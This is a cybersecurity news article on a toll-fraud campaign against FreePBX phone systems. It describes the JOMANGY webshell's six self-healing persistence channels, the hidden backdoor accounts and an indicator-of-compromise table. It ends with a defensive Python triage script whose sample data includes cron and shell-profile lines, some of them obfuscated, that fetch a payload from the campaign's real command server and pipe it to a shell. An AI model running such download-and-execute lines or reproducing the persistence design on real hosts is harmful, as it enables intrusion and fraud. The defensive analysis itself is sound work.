Industry News & Leadership

Hackers Use Six-Layer Persistence to Maintain Access on Compromised FreePBX Systems

Source: Cybersecurity News. Archived May 23, 2026.




By Tushar Subhra Dutta, May 22, 2026

A hacker group known as INJ3CTOR3 has been running an active campaign against FreePBX systems, deploying a newly discovered PHP webshell called JOMANGY that uses six separate persistence layers to stay embedded on compromised servers. The campaign targets internet-exposed VoIP phone systems and routes calls through them at the victims’ expense, a scheme known as toll fraud. With a target list of over 3,000 IP addresses, the operation is designed for mass automated exploitation.

FreePBX is an open-source interface used by businesses to manage phone systems built on Asterisk software. These setups handle real carrier accounts with SIP trunks that can originate actual phone calls. For an attacker, gaining access means routing calls through premium-rate numbers they control and letting the victim’s carrier send the bill, with none of the overhead that comes with ransomware or data theft.

Analysts at Cyble (CRIL) identified the campaign and published a detailed report shared with Cyber Security News. Researchers tied the operation to INJ3CTOR3 with high confidence, an actor that has targeted VoIP infrastructure for financial gain since at least 2019. Prior campaign generations were documented by Check Point Research in 2020, Palo Alto Unit 42 in 2022, and Fortinet in January 2026.

Figure: Campaign Architecture (Source – Cyble)

The Shadowserver Foundation tracked over 900 FreePBX hosts compromised during the January 2026 campaign wave. By May 2026, more than 700 of those systems remained infected despite five months of public disclosure. That number reflects how genuinely difficult these infections are to clear, even after the original entry point has been patched.

Two vulnerabilities are the most likely entry points for the current campaign. CVE-2025-64328 is a post-authentication command injection flaw in the FreePBX filestore module, while CVE-2025-57819 is a pre-authentication SQL injection bug in the FreePBX Endpoint module. Both are patched in current FreePBX releases, though patching an already-infected host leaves the cron infrastructure running and the malware fully capable of re-establishing itself.

Hackers Use Six-Layer Persistence to Maintain Access

What sets this campaign apart is how its persistence was engineered. The six channels are not independent backups sitting in parallel. Each one can reconstruct every other channel, making the infection genuinely self-healing. Clearing five of the six still hands the attacker a recovery window measured in minutes.

The first channel polls the attacker’s command-and-control server every one to three minutes via scheduled cron jobs, continuously re-downloading and re-executing the dropper. The second fires a re-infection payload on every root login and system reboot by injecting code into shell profile files. The third stores eight immutable crontab copies in hidden directories, protected by a file attribute that silently blocks deletion even by root, backed by two separate restore loops.

Figure: JOMANGY Webshell Operator Panel (Source – Cyble)

The fourth is a process watchdog that immediately re-downloads the dropper if the beacon processes disappear. The fifth plants webshell copies across more than twelve paths in the FreePBX web tree, many locked immutable, where a single authenticated request to any survivor rebuilds the full infection stack. The sixth is a PHP executor in the FreePBX high-availability module providing privileged command execution independently of all other channels.

Eighteen Hidden Accounts and Near-Zero Detection

The infection also quietly drops 18 backdoor accounts across three tiers. Nine carry full root-equivalent privileges, eight operate at the service account level, and one is injected into the FreePBX web panel database via MySQL. Account names like asterisk, freepbxuser, and spamfilter were deliberately chosen to blend into the legitimate account list administrators would expect to find.

JOMANGY had no prior public documentation before this analysis and uses double-layer obfuscation combining base64 encoding and ROT13 to defeat automated scanners. At the time of research, the primary dropper had only four detections across 76 antivirus engines, while k.php and wr.php had zero.

Anyone dealing with a confirmed infection is advised to rebuild from a clean baseline, as leaving even one channel active gives the attacker enough leverage to restore the entire infection stack within minutes.

Indicators of Compromise (IoCs)

| Type | Indicator | Description |
|---|---|---|
| IP Address | 45[.]95[.]147[.]178 | Primary C2 server (AS49870 Alsycon B.V., Netherlands) |
| IP Address | 45[.]234[.]176[.]202 | Prior campaign C2 (January 2026 encystPHP campaign, Brazilian infrastructure) |
| IP Address | 160[.]119[.]76[.]250 | Scanner/reconnaissance node in same AS49870 allocation as primary C2 |
| IP Address | 169[.]150[.]218[.]33 | Operator VPN IP embedded in wor.php ZenharR instance (Datapacket AS212238) |
| IP Address | 169[.]150[.]218[.]37 | Operator VPN IP embedded in wr.php ZenharR instance |
| IP Address | 146[.]70[.]129[.]114 | Earlier operator VPN IP embedded in early JOMANGY variant (M247 Europe SRL) |
| File Hash (MD5) | b506fc82 | Stage 1 Bash dropper (23,355 bytes); 4 detections across 76 AV engines |
| File Hash (MD5) | 100259af | Stage 2 k.php (~45KB Bash); zero VirusTotal detections at time of analysis |
| File Hash (MD5) | 49abb105 | Alternate k.php variant retrieved from VirusTotal (2026-04-29) |
| File Hash (MD5) | d40180f7 | Stage 3 wr.php (27KB Bash ZenharR dropper); zero VirusTotal detections |
| File Hash (MD5) | 995e6304 | wor.php (13KB Bash, parallel ZenharR dropper) |
| File Hash (MD5) | 71d94479 | Prior campaign (January 2026) encystPHP dropper |
| File Hash (SHA256 partial) | 039d648b | Early JOMANGY webshell variant; VT first seen 2026-04-07 |
| File Hash (MD5) | a8b65af6c142736ccf80420e44df240f | zen.php; assessed as ZenharR payload integrity reference |
| File Hash (MD5) | ec4ca4db5ec0b782e51224fa7082ac06 | Live auth token served by ask.php and _md5.php on C2 |
| File Hash (MD5) | b92c65af386ed772972b43cab0d55a4a | ZenharR auth hash embedded in wor.php instance |
| File Hash (MD5) | bfcedbc1831779921a0ee2cfaee004f2 | Auth hash in early JOMANGY variant (039d648b) |
| File Hash (MD5) | cf710203400b8c466e6dfcafcf36a411 | Third ZenharR hash observed by SANS ISC at /admin/modules/phones/ajax.php |
| File Hash (SHA1) | 6ea9c6d2d932532a4cd44c7974fb1a0a87dbfcf9 | SHA1 password hash for backdoor FreePBX web panel account “freepbxusers” |
| Watermark String | trace_e1ebf9066a951be519a24140711839ea | JOMANGY webshell watermark present in every deployed instance |
| Marker String | bm2cjjnRXac1WW3KT7k6MKTR | Unique marker from January 2026 encystPHP dropper; used as grep eviction target |
| URL | hxxp://45[.]95[.]147[.]178/k.php | Stage 2 dropper download URL (cron-polled every 1-3 minutes) |
| URL | hxxp://45[.]95[.]147[.]178/z/wr.php | Stage 3 ZenharR dropper download URL |
| URL | hxxp://45[.]95[.]147[.]178/z/wor.php | Parallel ZenharR dropper URL |
| URL | hxxp://45[.]95[.]147[.]178/z/post/root.php | Post-exploitation callback URL (root execution track) |
| URL | hxxp://45[.]95[.]147[.]178/z/post/noroot.php | Post-exploitation callback URL (non-root execution track) |
| File Name | people2.txt | C2-hosted IP inventory file containing 3,080 assessed target addresses |
| File Name | license.php | PHP executor written to /var/www/html/admin/modules/freepbx_ha/license.php |
| File Name | tryRoot1.sh | Embedded shell script that writes license.php and triggers FreePBX HA hooks |
| Backdoor Account | newfpbx, newfpbxs, xhimax | UID-0 OS backdoor accounts created via base64-obfuscated useradd commands |
| Backdoor Account | centos, admin, support, issabel, sangoma, emo | Additional UID-0 OS backdoor accounts created in plaintext by Stage 1 |
| Backdoor Account | sugarmaint, spamfilter, asteriskuser, supports, freepbxuser, supermaint, asterisk, hima | Service-tier OS backdoor accounts sharing same MD5-crypt password hash |
| Backdoor Account | freepbxusers | FreePBX web panel admin account injected into MySQL ampusers table |

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
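The six persistence channels and the account tiers described above translate directly into host-side checks. What follows is an added example, not Cyble's tooling and not code from the FreePBX project: a Python triage script that runs those checks over constructed stand-ins for what an administrator would collect from a suspect host (a crontab dump, lsattr output, /etc/passwd and /etc/shadow, root's shell profile, and the contents of a few PHP files). Indicator values come from the IoC table above, re-fanged only for local matching. Several things are assumptions: the article does not say in which order the base64 and ROT13 layers are applied, so the decoder tries both; the shell-profile check assumes the hook names the C2 host or k.php; and the sample file contents, the placeholder password hashes, and paths such as /var/spool/cron/.sys/crontab.1 and .cache.php are constructed for the demonstration.

```python
"""Added triage example for the JOMANGY persistence channels and backdoor accounts described above;
not Cyble's tooling and not part of FreePBX. Runs over constructed stand-ins for host artifacts."""
import base64
import codecs
import re

# Indicators from the article's IoC table (re-fanged here only for local text matching).
C2_HOST = "45.95.147.178"
WATERMARK = "trace_e1ebf9066a951be519a24140711839ea"  # JOMANGY webshell watermark
HA_EXECUTOR = "/var/www/html/admin/modules/freepbx_ha/license.php"
FAST_CRON = re.compile(r"^\*/[123]\s")              # fires every 1-3 minutes
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")   # long base64-looking token

def deobfuscate(blob):
    """Peel the base64 + ROT13 double layer. Layer order is an assumption, so both are tried; returns (order, text) or None."""
    orders = (("base64->rot13", lambda b: codecs.decode(base64.b64decode(b, validate=True).decode("ascii"), "rot_13")),
              ("rot13->base64", lambda b: base64.b64decode(codecs.decode(b, "rot_13"), validate=True).decode("ascii")))
    for name, peel in orders:
        try:
            text = peel(blob)
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
            continue
        if text.isprintable():
            return name, text
    return None

def check_cron(cron_text):
    """Channel 1: jobs that reach the C2 (in clear or inside a blob) on a 1-3 minute schedule."""
    findings = []
    for line in filter(None, map(str.strip, cron_text.splitlines())):
        why = ["C2 host in clear"] if C2_HOST in line else []
        for blob in B64_BLOB.findall(line):
            peeled = deobfuscate(blob)
            if peeled and C2_HOST in peeled[1]:
                why.append(f"C2 host inside {peeled[0]} payload")
        if why and FAST_CRON.match(line):
            why.append("1-3 minute schedule")
        if why:
            findings.append((line, why))
    return findings

def check_profile(profile_text):
    """Channel 2: re-infection hook in a login shell profile (assumes it names the C2 or k.php)."""
    return [l.strip() for l in profile_text.splitlines() if C2_HOST in l or "k.php" in l]

def check_immutable(lsattr_text):
    """Channels 3 and 5: +i crontab copies in hidden dirs and +i files in the web tree (lsattr output)."""
    found = []
    for line in lsattr_text.splitlines():
        attrs, _, path = line.partition(" ")
        if "i" in attrs and ("/." in path or path.startswith("/var/www/html/") or "cron" in path):
            found.append(path)
    return found

def check_accounts(passwd_text, shadow_text):
    """Tiers 1-2: extra UID-0 users, plus accounts sharing one password hash (the service-tier
    tell; `asterisk` is a legitimate FreePBX account, so its name alone proves nothing)."""
    pw = [l.split(":") for l in passwd_text.splitlines()]
    findings = [(f[0], "UID 0 but not root") for f in pw if len(f) > 2 and f[2] == "0" and f[0] != "root"]
    by_hash = {}
    for line in shadow_text.splitlines():
        f = line.split(":")
        if len(f) > 1 and f[1] and not f[1].startswith(("!", "*")):  # skip locked accounts
            by_hash.setdefault(f[1], []).append(f[0])
    findings += [(",".join(sorted(n)), "accounts share one password hash") for n in by_hash.values() if len(n) > 1]
    return findings

def check_webtree(files):
    """Channels 5 and 6: watermarked webshell copies and the HA-module executor path ({path: contents})."""
    hits = [(p, "webshell watermark") for p, body in files.items() if WATERMARK in body]
    return hits + [(p, "HA-module PHP executor path") for p in files if p == HA_EXECUTOR]

def audit(s):
    """Run every check; return {channel: findings}, dropping channels with nothing found."""
    report = {"cron_polling": check_cron(s["crontab"]), "profile_hook": check_profile(s["profile"]),
              "immutable_files": check_immutable(s["lsattr"]), "web_tree": check_webtree(s["web_files"]),
              "backdoor_accounts": check_accounts(s["passwd"], s["shadow"])}
    return {k: v for k, v in report.items() if v}

# Constructed samples (not captured from any real host). The obfuscated cron payload is built
# here so the layering is visible: ROT13 applied first, then base64.
SAMPLE_CMD = f"wget -qO- http://{C2_HOST}/k.php | sh"
SAMPLE_BLOB = base64.b64encode(codecs.encode(SAMPLE_CMD, "rot_13").encode()).decode()
SAMPLES = {
    "crontab": (f"*/2 * * * * echo {SAMPLE_BLOB} | base64 -d | tr A-Za-z N-ZA-Mn-za-m | sh\n"
                f"*/3 * * * * curl -s http://{C2_HOST}/k.php | sh\n"),
    "profile": f"export PATH=$PATH:/usr/local/bin\ncurl -s http://{C2_HOST}/k.php | sh >/dev/null 2>&1\n",
    "lsattr": ("--------------e------- /etc/crontab\n----i---------e------- /var/spool/cron/.sys/crontab.1\n"
               "----i---------e------- /var/www/html/admin/assets/js/.cache.php\n"),
    "passwd": ("root:x:0:0:root:/root:/bin/bash\nxhimax:x:0:0::/home/xhimax:/bin/bash\n"
               "spamfilter:x:1002:1002::/home/spamfilter:/bin/bash\nfreepbxuser:x:1003:1003::/home/freepbxuser:/bin/bash\n"),
    "shadow": ("root:$6$placeholder-root:20000:0:99999:7:::\nxhimax:$6$placeholder-xhimax:20000:0:99999:7:::\n"
               "spamfilter:$1$placeholder-shared:20000:0:99999:7:::\nfreepbxuser:$1$placeholder-shared:20000:0:99999:7:::\n"),
    "web_files": {"/var/www/html/admin/index.php": "<?php // stand-in for the legitimate FreePBX entry point",
                  "/var/www/html/admin/assets/js/.cache.php": f"<?php /* {WATERMARK} */ // constructed stand-in",
                  HA_EXECUTOR: "<?php // constructed stand-in for the HA-module executor"},
}

if __name__ == "__main__":
    print(audit(SAMPLES))
```

Running the script prints the channels it finds in the samples; on a real host the same functions take the output of `crontab -l`, `lsattr -R` over the cron and web directories, the two account files, and a walk of the web tree. The shared-hash check carries more weight than the account names: asterisk exists on every FreePBX install, and the article's tell for the service tier is that those accounts share one MD5-crypt hash. Any hit from any channel warrants the clean-baseline rebuild the article recommends, since the remaining channels can restore whatever is removed piecemeal.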